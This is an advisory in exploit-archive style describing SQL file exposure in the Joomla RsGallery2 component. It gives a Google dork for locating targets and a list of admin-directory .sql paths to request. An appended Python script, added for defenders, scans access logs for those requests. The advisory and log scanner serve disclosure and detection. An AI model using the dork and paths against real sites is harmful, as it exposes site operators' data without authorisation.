#################################################################################################

# Exploit Title : Joomla Com_RsGallery2 Components 4.4.1 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : rsgallery2.org ~ extensions.joomla.org/extension/rsgallery2/
# Software Download Link : rsgallery2.org/index.php/download
+ github.com/RSGallery2/RSGallery2_Component/releases/download/Version_4.4.1/RSGallery2_Component.4.4.1.zip
+ github.com/RSGallery2/RSGallery2_Component/releases
+ github.com/DimaSamodurov/erasvit/blob/master/administrator/components/com_rsgallery2/sql/rsgallery2.sql
+ github.com/DimaSamodurov/erasvit/tree/master/administrator/components/com_rsgallery2
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.11 ~ 4.4.1 ~ 4.2.101 ~ 4.2.102 ~ 4.2.103 ~ 4.3.0 ~ 4.3.1 alpha ~ 4.3.1 ~ 4.4.1 alpha + 4.4.1 beta ~ 4.4.1_beta 2
# Exploit Risk : Medium
# Google Dorks : inurl:''/administrator/components/com_rsgallery2/''
# Vulnerability Type :
CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ]
CWE-200 - [ Information Exposure ]
CWE-530 - [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/administrator

# Exploit :

/administrator/components/com_rsgallery2/sql/rsgallery2.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.10.14_to_1.11.0.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.11.0_to_1.11.1.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.11.10_to_1.11.11.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.11.11_to_1.12.0.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.11.7_to_1.11.8.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.12.1_to_1.12.2.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.12.2_to_1.13.2.sql
/administrator/components/com_rsgallery2/sql/upgrade_1.13.2_to_1.14.0.sql
/administrator/sql/updates/mysql/3.0.0.sql
/administrator/sql/updates/mysql/4.0.0.sql
/administrator/sql/updates/mysql/4.3.0.sql
/administrator/sql/updates/install.mysql.utf8.sql
/administrator/sql/updates/uninstall.mysql.utf8.sql

#################################################################################################

# Example Vulnerable Site =>

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
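
Added example, not part of the original advisory: a defender-side check that scans a web server access log for requests to the .sql paths listed above and reports whether the server actually served them. Combined Log Format is assumed; the function name, regexes and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Directories named in the advisory; a leading prefix (site in a subfolder) is allowed.
SQL_RE = re.compile(
    r'/administrator/(?:components/com_rsgallery2/sql|sql/updates(?:/mysql)?)'
    r'/[^/]+\.sql$',
    re.IGNORECASE,
)
SERVED = {200, 206, 304}  # statuses that mean the file is readable from the web

def find_sql_requests(lines):
    """Return (ip, path, status, verdict) for each request to an advisory path."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        # Drop the query string, decode %-escapes, collapse repeated slashes.
        path = unquote(m["target"].split("?", 1)[0])
        path = re.sub(r"/{2,}", "/", path)
        if not SQL_RE.search(path):
            continue
        status = int(m["status"])
        verdict = "EXPOSED" if status in SERVED else "blocked"
        hits.append((m["ip"], path, status, verdict))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Dec/2018:10:01:02 +0000] "GET /administrator/components/'
    'com_rsgallery2/sql/rsgallery2.sql HTTP/1.1" 200 5120 "-" "curl/7.61"',
    '192.0.2.10 - - [08/Dec/2018:10:01:05 +0000] "GET /site//administrator/sql/updates/'
    'mysql/4.3.0.sql?x=1 HTTP/1.1" 403 199 "-" "curl/7.61"',
    '198.51.100.7 - - [08/Dec/2018:10:02:00 +0000] "GET /index.php?option=com_rsgallery2 '
    'HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [08/Dec/2018:10:03:00 +0000] "GET /administrator/components/'
    'com_rsgallery2/sql/upgrade_1.11.7_to_1.11.8%2Esql HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_sql_requests(SAMPLE_LOG):
        print(*hit)
```

Any EXPOSED row means the web server is serving the component's SQL files; denying web access to .sql files under /administrator/ turns those rows into blocked ones.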